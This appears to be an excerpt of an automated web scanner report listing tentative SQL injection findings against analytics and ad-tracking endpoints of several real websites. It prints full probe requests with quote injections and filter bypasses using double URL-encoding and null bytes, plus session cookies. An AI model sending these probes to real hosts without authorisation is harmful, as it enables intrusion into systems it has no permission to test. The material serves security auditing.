Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:54:59 GMT
Server: Omniture DC/2.0.0
Content-Length: 405
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/ccardsccdc-us/1/H.17/s9749755890574?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A8%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705400772499673&purchaseID=1012011061705400772499673&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400772499673&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:54:59 GMT
Server: Omniture DC/2.0.0
xserver: www630
Content-Length: 0
Content-Type: text/html

1.7. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s99864659090526 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s99864659090526

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/ccardsccdc-us/1/H.17/s99864659090526?AQB=1&ndh=1&t=17/5/2011%205%3A42%3A21%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705422092885507&purchaseID=1012011061705422092885507&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705422092885507&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:30 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/ccardsccdc-us/1/H.17/s99864659090526 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/ccardsccdc-us/1/H.17/s99864659090526?AQB=1&ndh=1&t=17/5/2011%205%3A42%3A21%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705422092885507&purchaseID=1012011061705422092885507&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705422092885507&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:30 GMT
Server: Omniture DC/2.0.0
xserver: www404
Content-Length: 0
Content-Type: text/html

1.8. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://oimg.nbcuni.com
Path:	/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022

Issue detail

Request 1

GET /b'/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022?[AQB]&ndh=1&t=16/5/2011%2012%3A4%3A33%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=1%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 17:16:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 459
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/nbcuglobal, nbcucnbcd, nbcucnbcbu/1/H.2-pdv-2/
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022?[AQB]&ndh=1&t=16/5/2011%2012%3A4%3A33%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=1%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 17:16:16 GMT
Server: Omniture DC/2.0.0
xserver: www339
Content-Length: 0
Content-Type: text/html

1.9. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://oimg.nbcuni.com
Path:	/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958

Issue detail

Remediation detail

Request 1

GET /b/ss%00'/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958?[AQB]&ndh=1&t=16/5/2011%2013%3A11%3A50%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=2%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 18:23:44 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958?[AQB]&ndh=1&t=16/5/2011%2013%3A11%3A50%204%20300&ce=UTF-8&ns=nbcuniversal&pageName=Story%7CNews%7CUS%20News%7C43422860%7CEnergy%20Transfer%20to%20Buy%20Southern%20Union%20for%20%244.4%20Bil&g=http%3A//www.cnbc.com/id/43422860&r=http%3A//www.cnbc.com/id/43422860&cc=USD&ch=free%3A%20cnbc.com&server=www.cnbc.com&events=event6&v1=New&h1=cnbc%7Ccnbc.com%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&h2=miscellaneous%7CMergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%7Cmiscellaneous%7Cmiscellaneous&h3=www.cnbc.com%7Cid%7C43422860&c6=http%3A//www.cnbc.com/id/43422860&c8=cnbc&c9=cnbc.com&c10=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c11=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story%20%7C%2043422860&c12=cnbc.com%20%7C%20Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c13=New&c25=2%3A00PM&c29=Thursday&c30=Weekday&c31=News&c32=US%20News&c33=Mergers%20and%20Aquisitions%20*%20US%20*%20News%20*%20Story&c36=43422860&c37=Story&c38=NoPic&c39=The%20Associated%20Press&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: oimg.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF408051D011F-4000010B6001F0EB[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 18:23:44 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html

1.10. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://om.dowjoneson.com
Path:	/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/djglobal,djwsj/1%00'/H.20.3/s19508665378671?AQB=1&ndh=1&t=16/5/2011%206%3A22%3A20%204%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_U.S.%20Home_0_0_WH_0001_public&g=http%3A//online.wsj.com/home-page&cc=USD&ch=Online%20Journal&server=online.wsj.com&events=event12%2Cevent17%2Cevent64&c1=Home&h1=Online%20Journal%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public%2Chttp%3A//online.wsj.com/home-page&c2=WSJ_Home%20Page%20Public&h2=Online%20Journal%2Chome%20page%2CWSJ_Home%20Page%20Public%2CWSJ_Home_U.S.%20Home_0_0_WH_0001_public&c3=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&h3=Online%20Journal%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public&v4=WSJ_U.S.%20Home_0_0_WH_0001_public&h4=Online%20Journal%2CWSJ_Home%20Page%20Public%2CHome&c5=http%3A//online.wsj.com/home-page&h5=Online%20Journal%2CEdition_North_America_USA%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public&c6=http%3A//online.wsj.com/home-page&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=undefined&c19=home%20page&c20=0_0_WH_0001_public&c22=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c24=Edition_North_America_USA&v25=WSJ_Home%20Page%20Public&c26=WSJ_Home%20Page%20Public&c27=WSJ_free&v29=WSJ_Home%20Page%20Public&v31=Thursday&v32=6%3A00&v37=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c49=2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:40:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/djglobal,djwsj/1 was not found on this server.<
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/djglobal,djwsj/1%00''/H.20.3/s19508665378671?AQB=1&ndh=1&t=16/5/2011%206%3A22%3A20%204%20300&vmt=44BD02B1&ns=dowjones&pageName=WSJ_U.S.%20Home_0_0_WH_0001_public&g=http%3A//online.wsj.com/home-page&cc=USD&ch=Online%20Journal&server=online.wsj.com&events=event12%2Cevent17%2Cevent64&c1=Home&h1=Online%20Journal%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public%2Chttp%3A//online.wsj.com/home-page&c2=WSJ_Home%20Page%20Public&h2=Online%20Journal%2Chome%20page%2CWSJ_Home%20Page%20Public%2CWSJ_Home_U.S.%20Home_0_0_WH_0001_public&c3=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&h3=Online%20Journal%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public%2CWSJ_U.S.%20Home_0_0_WH_0001_public&v4=WSJ_U.S.%20Home_0_0_WH_0001_public&h4=Online%20Journal%2CWSJ_Home%20Page%20Public%2CHome&c5=http%3A//online.wsj.com/home-page&h5=Online%20Journal%2CEdition_North_America_USA%2CHome%2CWSJ_Home%20Page%20Public%2CWSJ_Home%20Page%20Public&c6=http%3A//online.wsj.com/home-page&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=undefined&c19=home%20page&c20=0_0_WH_0001_public&c22=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c24=Edition_North_America_USA&v25=WSJ_Home%20Page%20Public&c26=WSJ_Home%20Page%20Public&c27=WSJ_free&v29=WSJ_Home%20Page%20Public&v31=Thursday&v32=6%3A00&v37=WSJ_Home_U.S.%20Home_0_0_WH_0001_public&c49=2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72A64051D1F1F-4000010980086687[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:40:50 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html

1.11. http://r.turn.com/r/beacon [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=&1'=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
